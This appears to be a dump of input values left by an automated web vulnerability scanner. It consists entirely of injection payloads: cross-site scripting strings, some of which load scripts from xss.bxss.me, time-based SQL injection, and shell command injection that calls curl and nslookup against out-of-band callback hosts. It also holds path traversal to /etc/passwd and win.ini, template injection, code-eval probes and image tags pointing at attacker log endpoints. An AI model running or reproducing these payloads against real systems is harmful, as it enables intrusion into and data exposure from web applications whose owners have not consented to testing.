555<img src=xyz OnErRor=M3G4(9655)>

555}body{zzz:Expre/**/SSion(dk4Z(9931))}

555<input autofocus onfocus=oOYF(9727)>

bfg5725\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5725

555<body onload=TIPw(9159)>

555<img src=xyz OnErRor=Pjcn(9370)>

555gnwhK <ScRiPt >Hqvp(9211)</ScRiPt>

555QLTya <ScRiPt >GVwd(9830)</ScRiPt>

555<ScR<ScRiPt>IpT>9n5T(9560)</sCr<ScRiPt>IpT>

555<ScR<ScRiPt>IpT>lLKj(9948)</sCr<ScRiPt>IpT>

<a HrEF=http://xss.bxss.me></a>

555<ScRiPt >9n5T(9936)</ScRiPt>

555aCHJD <ScRiPt >dk4Z(9239)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9958></ScRiPt>

555<img/src=">" onerror=alert(9049)>

555<img/src=">" onerror=alert(9849)>

555<img src=//xss.bxss.me/t/dot.gif onload=TIPw(9920)>

<a HrEF=jaVaScRiPT:>

bfgx2276\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2276

555<WSHRYT>PWTS9[!+!]</WSHRYT>

bfg7743\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7743

555<ScRiPt >lLKj(9108)</ScRiPt>

555<WXC1TQ>OGNOX[!+!]</WXC1TQ>

555<WPXOCO>MSPFN[!+!]</WPXOCO>

555<WNSJ3F>6L86A[!+!]</WNSJ3F>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9758></ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%4D%33%47%34%289188%29%3C%2F%73%43%72%69%70%54%3E

bfgx1908\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1908

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9535></ScRiPt>

555<ScRiPt >oewW(9620)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%50%6A%63%6E%289951%29%3C%2F%73%43%72%69%70%54%3E

555<ifRAme sRc=9030.com></IfRamE>

555}body{zzz:Expre/**/SSion(oOYF(9557))}

<%={{={@{#{${dfb}}%>

555<img src=xyz OnErRor=TIPw(9202)>

555<ifRAme sRc=9554.com></IfRamE>

555<ifRAme sRc=9022.com></IfRamE>

555<ScRiPt >9n5T(9854)</ScRiPt>

<%={{={@{#{${dfb}}%>

555<ScRiPt >lLKj(9072)</ScRiPt>

555

555\u003CScRiPt\M3G4(9438)\u003C/sCripT\u003E

555<ifRAme sRc=9671.com></IfRamE>

555V1vOV <ScRiPt >oOYF(9299)</ScRiPt>

555<svg  \xa0onload=lLKj(9324)

555<img/src=">" onerror=alert(9369)>

555<aZjIPKX x=9280>

555<aVCnVRE x=9881>

555<aODYmJb x=9400>

555<svg  \xa0onload=9n5T(9611)

555<svg  \xa0onload=oewW(9381)

555

555\u003CScRiPt\Pjcn(9108)\u003C/sCripT\u003E

%35%35%35%3C%53%63%52%69%50%74%20%3E%54%49%50%77%289995%29%3C%2F%73%43%72%69%70%54%3E

<th:t="${dfb}#foreach

555<img sRc='http://attacker-9324/log.php?

555<WZIM6J>OWCZN[!+!]</WZIM6J>

555<avNNDSC x=9811>

555<isindex type=image src=1 onerror=lLKj(9065)>

555&lt

555<isindex type=image src=1 onerror=9n5T(9395)>

555&lt

<th:t="${dfb}#foreach

555<img sRc='http://attacker-9353/log.php?

555<img sRc='http://attacker-9935/log.php?

555<ifRAme sRc=9211.com></IfRamE>

555<img sRc='http://attacker-9971/log.php?

555<isindex type=image src=1 onerror=oewW(9343)>

555

\xf6<img zzz onmouseover=M3G4(99891) //\xf6>

\xf6<img zzz onmouseover=Pjcn(90911) //\xf6>

555<aDDlBWN<

555\u003CScRiPt\TIPw(9629)\u003C/sCripT\u003E

555<iframe src='data:text/html

555

555<iframe src='data:text/html

555<aB4quU1<

555<iframe src='data:text/html

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<input autofocus onfocus=Pjcn(9219)>

555&lt

555<azyI1ZD x=9262>

555<aZGxBkV<

555<aQlNEqa<

555<body onload=lLKj(9195)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555'"()&%<zzz><ScRiPt >8zp8(9808)</ScRiPt>

1vNNR3k6O

555<img sRc='http://attacker-9358/log.php?

555'"()&%<zzz><ScRiPt >gzGB(9411)</ScRiPt>

555

\xf6<img zzz onmouseover=TIPw(91871) //\xf6>

echo zpbohj$()\ iencki\nz^xyu||a #' &echo zpbohj$()\ iencki\nz^xyu||a #|" &echo zpbohj$()\ iencki\nz^xyu||a #

555

555<img src=//xss.bxss.me/t/dot.gif onload=lLKj(9670)>

555<body onload=9n5T(9586)>

555<input autofocus onfocus=M3G4(9683)>

response.write(9533469*9104064)

555<body onload=oewW(9516)>

<a HrEF=http://xss.bxss.me></a>

&echo ghpfzw$()\ vnhiur\nz^xyu||a #' &echo ghpfzw$()\ vnhiur\nz^xyu||a #|" &echo ghpfzw$()\ vnhiur\nz^xyu||a #

'+response.write(9533469*9104064)+'

'"()&%<zzz><ScRiPt >8zp8(9144)</ScRiPt>

555

555&echo pooclx$()\ xhpqui\nz^xyu||a #' &echo pooclx$()\ xhpqui\nz^xyu||a #|" &echo pooclx$()\ xhpqui\nz^xyu||a #

555<input autofocus onfocus=TIPw(9704)>

"+response.write(9533469*9104064)+"

|echo szdzzw$()\ zogjwl\nz^xyu||a #' |echo szdzzw$()\ zogjwl\nz^xyu||a #|" |echo szdzzw$()\ zogjwl\nz^xyu||a #

G3RZEurH

555<img src=//xss.bxss.me/t/dot.gif onload=oewW(9463)>

'"()&%<zzz><ScRiPt >gzGB(9132)</ScRiPt>

555

555<aMUbi33<

<a HrEF=http://xss.bxss.me></a>

555

5559653947

555<img src=xyz OnErRor=lLKj(9401)>

../../../../../../../../../../../../../../etc/passwd

555|echo irtpir$()\ ofmlnz\nz^xyu||a #' |echo irtpir$()\ ofmlnz\nz^xyu||a #|" |echo irtpir$()\ ofmlnz\nz^xyu||a #

555

dfb{{98991*97996}}xca

<a HrEF=jaVaScRiPT:>

555<img src=//xss.bxss.me/t/dot.gif onload=9n5T(9521)>

555

<a HrEF=http://xss.bxss.me></a>

555

(nslookup -q=cname hitwcsyjrplbmfe81c.bxss.me||curl hitwcsyjrplbmfe81c.bxss.me))

../../../../../../../../../../../../../../windows/win.ini

5559090663

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

12345'"\'\")

file:///etc/passwd

$(nslookup -q=cname hitvfnhbdmaff9ab60.bxss.me||curl hitvfnhbdmaff9ab60.bxss.me)

555

555<img src=xyz OnErRor=9n5T(9363)>

555<img/src=">" onerror=alert(9211)>

bfg5802\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5802

<a HrEF=jaVaScRiPT:>

555<esi:include src="http://bxss.me/rpb.png"/>

&nslookup -q=cname hitdpjkwgexxme42c9.bxss.me&'\"`0&nslookup -q=cname hitdpjkwgexxme42c9.bxss.me&`'

555

${9999733+9999928}

<a HrEF=jaVaScRiPT:>

555<img src=xyz OnErRor=oewW(9056)>

bfgx6202\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6202

555

bfg3422\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3422

555

555

555}body{zzz:Expre/**/SSion(Pjcn(9861))}

../555

&(nslookup -q=cname hitygmrjmyckld2b22.bxss.me||curl hitygmrjmyckld2b22.bxss.me)&'\"`0&(nslookup -q=cname hitygmrjmyckld2b22.bxss.me||curl hitygmrjmyckld2b22.bxss.me)&`'

555gwGkApIo

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

555

555

555}body{zzz:Expre/**/SSion(M3G4(9958))}

dfb[[${98991*97996}]]xca

dfb__${98991*97996}__::.x

|(nslookup -q=cname hitxvdzpwnstk4f26f.bxss.me||curl hitxvdzpwnstk4f26f.bxss.me)

555

555<img/src=">" onerror=alert(9265)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%6C%4C%4B%6A%289935%29%3C%2F%73%43%72%69%70%54%3E

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

555

555

<%={{={@{#{${dfb}}%>

555}body{zzz:Expre/**/SSion(TIPw(9837))}

555

555&n996649=v990381

`(nslookup -q=cname hitufvhhrkuljc1f39.bxss.me||curl hitufvhhrkuljc1f39.bxss.me)`

555x3b17 <ScRiPt >Pjcn(9369)</ScRiPt>

Http://bxss.me/t/fit.txt

555

555

555

555<img/src=">" onerror=alert(9993)>

555

bfgx6871\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6871

http://bxss.me/t/fit.txt?.jpg

)

555SZlf6 <ScRiPt >TIPw(9730)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%39%6E%35%54%289391%29%3C%2F%73%43%72%69%70%54%3E

/etc/shells

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555qmDHK <ScRiPt >M3G4(9611)</ScRiPt>

555

555<WPJRYI>AZBKC[!+!]</WPJRYI>

555

555

555\u003CScRiPt\lLKj(9416)\u003C/sCripT\u003E

dfb__${98991*97996}__::.x

!(()&&!|*|*|

%35%35%35%3C%53%63%52%69%50%74%20%3E%6F%65%77%57%289405%29%3C%2F%73%43%72%69%70%54%3E

c:/windows/win.ini

'.gethostbyname(lc('hitop'.'spijcynn4fea0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(85).chr(112).chr(69).'

555

555<WACTHS>TP6JZ[!+!]</WACTHS>

<th:t="${dfb}#foreach

-1 OR 2+904-904-1=0+0+0+1 --

555

^(#$!@#$)(()))******

bxss.me

".gethostbyname(lc("hitvt"."ccgvkrct0c4d1.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(65).chr(108).chr(85)."

555

555

555

555&lt

555\u003CScRiPt\oewW(9600)\u003C/sCripT\u003E

<%={{={@{#{${dfb}}%>

555<ScRiPt >9G0z(9950)</ScRiPt>

-1 OR 2+639-639-1=0+0+0+1

'

555

555

555

555

"

555<ifRAme sRc=9251.com></IfRamE>

555\u003CScRiPt\9n5T(9513)\u003C/sCripT\u003E

555

555<ifRAme sRc=9584.com></IfRamE>

555<W5KHAZ>TLLF4[!+!]</W5KHAZ>

-1' OR 2+338-338-1=0+0+0+1 --

555

555

'"()

555

555

555'&&sleep(27*1000)*fqvmwe&&'

HttP://bxss.me/t/xss.html?%00

555

555

${@print(md5(31337))}

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

-1' OR 2+649-649-1=0+0+0+1 or 'Zl110h5N'='

"+"A".concat(70-3).concat(22*4).concat(108).concat(71).concat(122).concat(74)+(require"socket" Socket.gethostbyname("hittp"+"eeyfolrw73f6c.bxss.me.")[3].to_s)+"

555"&&sleep(27*1000)*axflar&&"

555

-1" OR 2+365-365-1=0+0+0+1 --

555&lt

bxss.me/t/xss.html?%00

555

${@print(md5(31337))}\

555

'+'A'.concat(70-3).concat(22*4).concat(121).concat(75).concat(112).concat(88)+(require'socket' Socket.gethostbyname('hitfu'+'dotoaleieb6a8.bxss.me.')[3].to_s)+'

555'||sleep(27*1000)*acpmxf||'

555

555

555"||sleep(27*1000)*ffnouc||"

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555

555<WCAPBJ>YMKG6[!+!]</WCAPBJ>

\xf6<img zzz onmouseover=lLKj(90101) //\xf6>

'.print(md5(31337)).'

555<aFLLtOk x=9422>

555

<th:t="${dfb}#foreach

555

555

555*if(now()=sysdate(),sleep(15),0)

555

555<ifRAme sRc=9884.com></IfRamE>

555&lt

555<aPPXNnk x=9349>

555

\xf6<img zzz onmouseover=oewW(96231) //\xf6>

555

555

comments

555<ScRiPt >jNoP(9599)</ScRiPt>

555

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555

xfs.bxss.me

555

555

'"

comments

555<script>9G0z(9732)</script>

555

555

555

555

555

<!--

comments/.

5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z

555

555

555<W6AGOW>HHY7V[!+!]</W6AGOW>

555'"()&%<zzz><ScRiPt >X16q(9264)</ScRiPt>

555<ax6Egm4 x=9950>

555<input autofocus onfocus=oewW(9438)>

\xf6<img zzz onmouseover=9n5T(97211) //\xf6>

555<input autofocus onfocus=lLKj(9317)>

555<img sRc='http://attacker-9611/log.php?

555

555

555

555

555

555

dfb{{98991*97996}}xca

555<img sRc='http://attacker-9941/log.php?

'"()&%<zzz><ScRiPt >X16q(9716)</ScRiPt>

555

555

555

5559020273

555<script>jNoP(9573)</script>

555<img sRc='http://attacker-9151/log.php?

555

555

555<a7E31cl<

5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z

555<aznX3bB<

<a HrEF=http://xss.bxss.me></a>

555<script>9G0z(9705)</script>9705

555

dfb[[${98991*97996}]]xca

<a HrEF=http://xss.bxss.me></a>

555

555<input autofocus onfocus=9n5T(9815)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555

555<awXAzC8<

555

<a HrEF=jaVaScRiPT:>

555

555<script>jNoP(9964)</script>9964

555<ScR<ScRiPt>IpT>9G0z(9720)</sCr<ScRiPt>IpT>

555-1

<a HrEF=jaVaScRiPT:>

dfb__${98991*97996}__::.x

555}body{zzz:Expre/**/SSion(lLKj(9902))}

555

555<ScR<ScRiPt>IpT>jNoP(9310)</sCr<ScRiPt>IpT>

<a HrEF=http://xss.bxss.me></a>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555-1)

555<ScRiPt >9G0z(9447)</ScRiPt>

555lutQZ <ScRiPt >lLKj(9886)</ScRiPt>

555-1 waitfor delay '0:0:15' --

555}body{zzz:Expre/**/SSion(oewW(9490))}

<a HrEF=jaVaScRiPT:>

dfb{{98991*97996}}xca

555<ScRiPt >8zp8(9876)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9054></ScRiPt>

555x8SOQufr'

555<ScRiPt >jNoP(9525)</ScRiPt>

555}body{zzz:Expre/**/SSion(9n5T(9436))}

555<WYQAI6>EIWM8[!+!]</WYQAI6>

555L4ip0 <ScRiPt >oewW(9953)</ScRiPt>

555-1 OR 433=(SELECT 433 FROM PG_SLEEP(15))--

dfb[[${98991*97996}]]xca

555<WKM3KO>ZHX1J[!+!]</WKM3KO>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9049></ScRiPt>

555kHMXA <ScRiPt >9n5T(9980)</ScRiPt>

555<WHHIJF>HIG4J[!+!]</WHHIJF>

555<ScRiPt >9G0z(9816)</ScRiPt>

555-1) OR 587=(SELECT 587 FROM PG_SLEEP(15))--

555<script>8zp8(9489)</script>

555<ifRAme sRc=9286.com></IfRamE>

555-1)) OR 14=(SELECT 14 FROM PG_SLEEP(15))--

555<ScRiPt >jNoP(9997)</ScRiPt>

555<WN73WW>KY99B[!+!]</WN73WW>

dfb__${98991*97996}__::.x

555<ifRAme sRc=9365.com></IfRamE>

555<svg  \xa0onload=9G0z(9791)

555

5553EpnOVy6' OR 451=(SELECT 451 FROM PG_SLEEP(15))--

555<a17KXbz x=9761>

response.write(9949501*9978498)

555<script>8zp8(9442)</script>9442

555<svg  \xa0onload=jNoP(9417)

1xbrPSb2O

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

echo uahceb$()\ xncxwz\nz^xyu||a #' &echo uahceb$()\ xncxwz\nz^xyu||a #|" &echo uahceb$()\ xncxwz\nz^xyu||a #

n2fgiP0Z

555QYbfAqwZ') OR 182=(SELECT 182 FROM PG_SLEEP(15))--

../../../../../../../../../../../../../../etc/passwd

'+response.write(9949501*9978498)+'

"+response.write(9949501*9978498)+"

555

555

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

555<ifRAme sRc=9693.com></IfRamE>

${9999627+9999725}

555<esi:include src="http://bxss.me/rpb.png"/>

&echo ylqmse$()\ lqasoo\nz^xyu||a #' &echo ylqmse$()\ lqasoo\nz^xyu||a #|" &echo ylqmse$()\ lqasoo\nz^xyu||a #

555

../../../../../../../../../../../../../../windows/win.ini

555

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

555

555

555<aGD3FXB x=9297>

555<isindex type=image src=1 onerror=9G0z(9632)>

12345'"\'\")

555

555&n907986=v986386

555

555&echo gmeajz$()\ uftqrk\nz^xyu||a #' &echo gmeajz$()\ uftqrk\nz^xyu||a #|" &echo gmeajz$()\ uftqrk\nz^xyu||a #

)

file:///etc/passwd

555Vf8Yl5mU')) OR 665=(SELECT 665 FROM PG_SLEEP(15))--

Http://bxss.me/t/fit.txt

'.gethostbyname(lc('hitfg'.'hwzcbprx35f5b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(86).chr(115).chr(74).'

".gethostbyname(lc("hitkl"."zopkyazb323d4.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(88).chr(101).chr(68)."

555

!(()&&!|*|*|

555<img sRc='http://attacker-9568/log.php?

555

555<ScR<ScRiPt>IpT>8zp8(9243)</sCr<ScRiPt>IpT>

555<atZO0Ws x=9616>

555

HttP://bxss.me/t/xss.html?%00

|echo jikbjq$()\ nxgttz\nz^xyu||a #' |echo jikbjq$()\ nxgttz\nz^xyu||a #|" |echo jikbjq$()\ nxgttz\nz^xyu||a #

555

555

http://bxss.me/t/fit.txt?.jpg

555<img sRc='http://attacker-9705/log.php?

^(#$!@#$)(()))******

555

/etc/shells

555|echo bfophe$()\ tphycj\nz^xyu||a #' |echo bfophe$()\ tphycj\nz^xyu||a #|" |echo bfophe$()\ tphycj\nz^xyu||a #

555<ScRiPt >gzGB(9839)</ScRiPt>

555<isindex type=image src=1 onerror=jNoP(9747)>

'

../555

555

"+"A".concat(70-3).concat(22*4).concat(109).concat(76).concat(110).concat(73)+(require"socket" Socket.gethostbyname("hitqu"+"cbwbtymh10f1b.bxss.me.")[3].to_s)+"

comments

bxss.me/t/xss.html?%00

(nslookup -q=cname hitbempduqtkn8cf0b.bxss.me||curl hitbempduqtkn8cf0b.bxss.me))

"

555

$(nslookup -q=cname hitfatyveukbtfd4fe.bxss.me||curl hitfatyveukbtfd4fe.bxss.me)

555<ScRiPt >8zp8(9975)</ScRiPt>

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

c:/windows/win.ini

555

555

555

'+'A'.concat(70-3).concat(22*4).concat(107).concat(75).concat(101).concat(77)+(require'socket' Socket.gethostbyname('hitzi'+'wzrxbxtxb8fc2.bxss.me.')[3].to_s)+'

comments

555

'"()

${@print(md5(31337))}

555

comments/.

555

555

bxss.me

555So2hH5Ce

&nslookup -q=cname hitexvgiqahnj310d4.bxss.me&'\"`0&nslookup -q=cname hitexvgiqahnj310d4.bxss.me&`'

555<iframe src='data:text/html

555

555

555'&&sleep(27*1000)*qbkotb&&'

${@print(md5(31337))}\

555

555

555

555

555

555

555<img sRc='http://attacker-9351/log.php?

555<aEPR1kv<

&(nslookup -q=cname hitgsuefrehdu3ae89.bxss.me||curl hitgsuefrehdu3ae89.bxss.me)&'\"`0&(nslookup -q=cname hitgsuefrehdu3ae89.bxss.me||curl hitgsuefrehdu3ae89.bxss.me)&`'

555<iframe src='data:text/html

555<aw0w1Pu<

555<WILOQD>T3BR5[!+!]</WILOQD>

555

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9516></ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555"&&sleep(27*1000)*obezyi&&"

'.print(md5(31337)).'

555

555

xfs.bxss.me

'"

555

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

|(nslookup -q=cname hitaeckkogbqqf6fa2.bxss.me||curl hitaeckkogbqqf6fa2.bxss.me)

555'"()&%<zzz><ScRiPt >PyoU(9769)</ScRiPt>

555

555'||sleep(27*1000)*ofoelh||'

555

555

555

555

<!--

555

555'"

555<body onload=jNoP(9993)>

`(nslookup -q=cname hitupluzabrcod8d11.bxss.me||curl hitupluzabrcod8d11.bxss.me)`

'"()&%<zzz><ScRiPt >PyoU(9514)</ScRiPt>

555"||sleep(27*1000)*ucdlum||"

555

555

555'"()&%<zzz><ScRiPt >DOoH(9389)</ScRiPt>

555

555\xc0\xa7\xc0\xa2%2527%2522\'\"

555<aqHUuOI<

555<body onload=9G0z(9457)>

555<ScRiPt >8zp8(9866)</ScRiPt>

-1 OR 2+552-552-1=0+0+0+1 --

5559392979

555

555

555

555

@@m7E2E

555

-1 OR 2+350-350-1=0+0+0+1

555<script>gzGB(9671)</script>

555

555

555

555

555'"()&%<zzz><ScRiPt >h6X5(9313)</ScRiPt>

555

555'"()&%<zzz><ScRiPt >fap8(9422)</ScRiPt>

555

-1' OR 2+806-806-1=0+0+0+1 --

555

555<svg  \xa0onload=8zp8(9892)

555<img src=//xss.bxss.me/t/dot.gif onload=9G0z(9423)>

555

555

555

555

555

-1' OR 2+286-286-1=0+0+0+1 or 'MKIalMpI'='

555

-1" OR 2+40-40-1=0+0+0+1 --

555

555<img src=//xss.bxss.me/t/dot.gif onload=jNoP(9807)>

'"()&%<zzz><ScRiPt >DOoH(9336)</ScRiPt>

555

555

555

555

555

555*if(now()=sysdate(),sleep(15),0)

555

555

555

'"()&%<zzz><ScRiPt >fap8(9750)</ScRiPt>

5559362237

'"()&%<zzz><ScRiPt >h6X5(9687)</ScRiPt>

555<script>gzGB(9318)</script>9318

555

555

555'"()&%<zzz><ScRiPt >LF4H(9525)</ScRiPt>

555

555

555<isindex type=image src=1 onerror=8zp8(9122)>

555'"()&%<zzz><ScRiPt >mvgj(9844)</ScRiPt>

555<img src=xyz OnErRor=9G0z(9916)>

555'"()&%<zzz><ScRiPt >vv90(9963)</ScRiPt>

555

555'"()&%<zzz><ScRiPt >zOnC(9638)</ScRiPt>

555

5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z

555

'"()&%<zzz><ScRiPt >LF4H(9200)</ScRiPt>

555<img src=xyz OnErRor=jNoP(9234)>

5559869384

555

bfg10012\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl10012

555

555

5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z

555<img/src=">" onerror=alert(9940)>

555

555

5559774996

555<iframe src='data:text/html

555<ScR<ScRiPt>IpT>gzGB(9665)</sCr<ScRiPt>IpT>

bfgx5106\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5106

555

555

bfg3818\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3818

'"()&%<zzz><ScRiPt >vv90(9825)</ScRiPt>

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

5559358992

'"()&%<zzz><ScRiPt >mvgj(9842)</ScRiPt>

'"()&%<zzz><ScRiPt >zOnC(9720)</ScRiPt>

555<img/src=">" onerror=alert(9461)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%39%47%30%7A%289951%29%3C%2F%73%43%72%69%70%54%3E

bfgx1235\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1235

555<ScRiPt >gzGB(9553)</ScRiPt>

555'"()&%<zzz><ScRiPt >nX3f(9644)</ScRiPt>

555'"()&%<zzz><ScRiPt >hjYA(9274)</ScRiPt>

555

5559083636

555'"()&%<zzz><ScRiPt >mKVZ(9161)</ScRiPt>

5559250320

555-1

555<body onload=8zp8(9060)>

555\u003CScRiPt\9G0z(9412)\u003C/sCripT\u003E

%35%35%35%3C%53%63%52%69%50%74%20%3E%6A%4E%6F%50%289666%29%3C%2F%73%43%72%69%70%54%3E

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

bfg9611\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9611

bfg6472\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6472

bfg9106\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9106

'"()&%<zzz><ScRiPt >nX3f(9419)</ScRiPt>

5559282606

555'"()&%<zzz><ScRiPt >sEMM(9240)</ScRiPt>

'"()&%<zzz><ScRiPt >hjYA(9945)</ScRiPt>

bfgx3628\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3628

555

bfgx3418\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3418

555

'"()&%<zzz><ScRiPt >mKVZ(9821)</ScRiPt>

555\u003CScRiPt\jNoP(9839)\u003C/sCripT\u003E

bfg7228\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7228

bfgx4329\xc0\xbez1\xc0\xbcz2a\x90bcxhjl4329

'"()&%<zzz><ScRiPt >sEMM(9786)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=8zp8(9661)>

5559265390

555

<th:t="${dfb}#foreach

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9617></ScRiPt>

555-1)

555&lt

<%={{={@{#{${dfb}}%>

5559200118

<th:t="${dfb}#foreach

bfg3051\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3051

555

555<ScRiPt >gzGB(9040)</ScRiPt>

555&lt

bfgx10013\xc0\xbez1\xc0\xbcz2a\x90bcxhjl10013

5559335527

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

555<img src=xyz OnErRor=8zp8(9586)>

bfgx8334\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8334

bfg1649\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl1649

5559354707

555

555<img/src=">" onerror=alert(9365)>

bfg1951\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl1951

\xf6<img zzz onmouseover=9G0z(94301) //\xf6>

bfg8138\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8138

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555

555<svg  \xa0onload=gzGB(9488)

\xf6<img zzz onmouseover=jNoP(98311) //\xf6>

<%={{={@{#{${dfb}}%>

%35%35%35%3C%53%63%52%69%50%74%20%3E%38%7A%70%38%289755%29%3C%2F%73%43%72%69%70%54%3E

555

<%={{={@{#{${dfb}}%>

555

<th:t="${dfb}#foreach

555

555<input autofocus onfocus=9G0z(9813)>

555-1 waitfor delay '0:0:15' --

bfgx3108\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3108

555

555<input autofocus onfocus=jNoP(9211)>

555rDickIQw'

555<isindex type=image src=1 onerror=gzGB(9833)>

bfgx7666\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7666

dfb{{98991*97996}}xca

bfgx3452\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3452

555

<th:t="${dfb}#foreach

<a HrEF=http://xss.bxss.me></a>

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<a HrEF=http://xss.bxss.me></a>

bfg5316\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5316

555

555\u003CScRiPt\8zp8(9244)\u003C/sCripT\u003E

555<iframe src='data:text/html

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

555

<th:t="${dfb}#foreach

555

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

<a HrEF=jaVaScRiPT:>

<a HrEF=jaVaScRiPT:>

555-1 OR 361=(SELECT 361 FROM PG_SLEEP(15))--

555

<th:t="${dfb}#foreach

555

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555<body onload=gzGB(9333)>

555&lt

dfb[[${98991*97996}]]xca

bfgx2506\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2506

555

555

555}body{zzz:Expre/**/SSion(jNoP(9835))}

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

\xf6<img zzz onmouseover=8zp8(93621) //\xf6>

555-1) OR 891=(SELECT 891 FROM PG_SLEEP(15))--

555}body{zzz:Expre/**/SSion(9G0z(9585))}

555

555

555YWNbf <ScRiPt >jNoP(9424)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=gzGB(9989)>

<th:t="${dfb}#foreach

555

555

dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555sqEva <ScRiPt >9G0z(9609)</ScRiPt>

<th:t="${dfb}#foreach

<th:t="${dfb}#foreach

555-1)) OR 490=(SELECT 490 FROM PG_SLEEP(15))--

555

<%={{={@{#{${dfb}}%>

dfb{{98991*97996}}xca

555<input autofocus onfocus=8zp8(9124)>

555<WQSWDD>PLZBG[!+!]</WQSWDD>

555<img src=xyz OnErRor=gzGB(9688)>

dfb[[${98991*97996}]]xca

555

555

dfb__${98991*97996}__::.x

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<WOIBAE>CCXB6[!+!]</WOIBAE>

dfb{{98991*97996}}xca

555

555

555

<a HrEF=http://xss.bxss.me></a>

555

5554pMV1LO9' OR 796=(SELECT 796 FROM PG_SLEEP(15))--

dfb{{98991*97996}}xca

dfb__${98991*97996}__::.x

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

dfb{{98991*97996}}xca

555

